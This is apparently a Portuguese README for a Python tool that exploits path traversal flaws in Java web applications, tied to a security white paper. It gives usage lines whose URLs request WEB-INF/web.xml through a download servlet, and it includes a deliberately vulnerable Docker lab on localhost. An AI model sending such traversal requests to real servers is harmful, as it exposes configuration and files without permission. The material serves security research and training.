
Ferramenta para ajudar na exploração de vulnerabilidades de path traversal em aplicações web Java.
Ferramenta para auxiliar na exploração de vulnerabilidades de path traversal em aplicações web Java.
Esta ferramenta é referenciada no white paper da Invicti Security Explorando vulnerabilidades de path traversal em aplicações web Java.
Python3 é necessário para esta ferramenta.
Execute o seguinte comando:
pip install -r requirements.txt
Após a instalação, forneça uma URL de exploit da seguinte forma:
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>
Os resultados (arquivos baixados) estão disponíveis na pasta results.
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"
Uma aplicação web vulnerável a uma vulnerabilidade de path traversal é fornecida na pasta docker.
Para iniciar, entre na pasta docker e execute:
docker-compose up
A aplicação está acessível em http://127.0.0.1:8082/vulnerable/.
Para explorar a vulnerabilidade de path traversal, visite: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml